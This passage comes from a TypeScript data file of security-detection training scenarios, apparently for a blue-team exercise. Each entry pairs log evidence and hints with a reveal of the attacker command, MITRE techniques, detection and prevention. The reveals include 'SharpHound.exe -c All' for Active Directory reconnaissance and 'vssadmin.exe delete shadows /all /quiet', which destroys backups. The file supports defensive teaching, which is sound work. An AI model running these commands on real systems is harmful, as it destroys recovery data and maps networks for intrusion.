      howToPrevent: "Egress allow-list with explicit FQDNs, TLS inspection, behavioral C2 detection (RITA, AC-Hunter).",
      realWorldExamples: ["Cobalt Strike (every APT)", "Sliver", "Brute Ratel"],
      recommendedReading: [
        { title: "RITA Beacon Analysis", url: "https://www.activecountermeasures.com/free-tools/rita/" },
      ],
    },
  },
  {
    id: "discovery-bloodhound",
    name: "Bloodtrail",
    category: "Discovery",
    difficulty: "advanced",
    description: "A non-admin user queried thousands of AD objects via LDAP in 5 minutes.",
    backstory: "DC logs: 8,400 LDAP queries from opuser@DOMAIN in 5 minutes. Queries include (objectClass=user), (objectClass=group), nested group memberships.",
    mitreTechniques: ["T1087.002", "T1482"],
    platforms: ["windows", "active-directory"],
    atomicTestId: "T1087.002-1",
    tags: ["bloodhound", "ldap", "ad-recon"],
    hints: [
      "SharpHound (BloodHound collector) issues mass LDAP queries.",
      "Any authenticated user can read most AD objects.",
      "Look for new .json files or .zip in user temp.",
    ],
    timeLimitMinutes: 20,
    reveal: {
      name: "Bloodtrail",
      category: "Discovery",
      mitreTechniques: ["T1087.002 - Domain Account Discovery", "T1482 - Domain Trust Discovery"],
      description: "BloodHound's SharpHound collector enumerating the entire AD graph for attack-path analysis.",
      sourceCode: "SharpHound.exe -c All --zipfilename out.zip",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "-c All", explanation: "Collect all collection methods — users, groups, sessions, ACLs, trusts, GPOs." },
      ],
      whyItWorks: "AD is read-by-default for authenticated users. SharpHound makes anomalous query volume the only signal.",
      howToDetect: "LDAP query volume per user per 5m baseline + alert. Honeypot AD objects that trigger on read. Microsoft Defender for Identity has built-in detection.",
      whatYouShouldHaveSeen: "Spike of LDAP search requests, then a .zip / .json file write, then exfil.",
      howToPrevent: "ADCS hardening, tiered admin model, MS Defender for Identity, LDAP query rate-limit alerts.",
      realWorldExamples: ["Standard pre-exec in every AD ransomware op"],
      recommendedReading: [
        { title: "BloodHound docs", url: "https://bloodhound.specterops.io/" },
      ],
    },
  },
  {
    id: "impact-ransomware-shadowcopy",
    name: "Silent Snapshots",
    category: "Impact",
    difficulty: "intermediate",
    description: "vssadmin deleted all shadow copies.",
    backstory: "Sysmon Event 1: vssadmin.exe delete shadows /all /quiet — from a host that has no backup software installed.",
    mitreTechniques: ["T1490"],
    platforms: ["windows"],
    atomicTestId: "T1490-1",
    tags: ["ransomware", "vssadmin", "impact"],
    hints: [
      "vssadmin delete shadows is the ransomware signature move.",
      "Always precedes file encryption by minutes.",
      "Also watch for wmic shadowcopy delete, wbadmin delete catalog.",
    ],
    timeLimitMinutes: 10,
    reveal: {
      name: "Silent Snapshots",
      category: "Impact",
      mitreTechniques: ["T1490 - Inhibit System Recovery"],
      description: "Pre-encryption shadow copy removal — prevents file restore via VSS.",
      sourceCode: "vssadmin.exe delete shadows /all /quiet",
      codeLanguage: "bash",
      codeExplanation: [
        { line: 1, code: "vssadmin delete shadows /all /quiet", explanation: "Removes every Volume Shadow Copy; /quiet suppresses confirmation prompt." },
      ],
      whyItWorks: "VSS is the OS-level snapshot mechanism. Without it, file-version recovery becomes impossible.",
      howToDetect: "Sysmon Event 1: vssadmin.exe with delete shadows in command line. Block via ASR rule 'Block credential stealing from LSASS' alternative — Defender has a dedicated ransomware behavior rule.",
      whatYouShouldHaveSeen: "vssadmin/wmic/wbadmin execution with delete-related args, immediately followed by mass file modifications.",
      howToPrevent: "Restrict vssadmin to admins, Defender Controlled Folder Access, offline immutable backups, EDR ransomware behavioral protection.",
      realWorldExamples: ["WannaCry", "Ryuk", "REvil", "LockBit"],
      recommendedReading: [
        { title: "MITRE T1490", url: "https://attack.mitre.org/techniques/T1490/" },
      ],
    },
  },
];

export function getScenario(id: string): ScenarioDef | undefined {
  return SCENARIOS.find((s) => s.id === id);
}
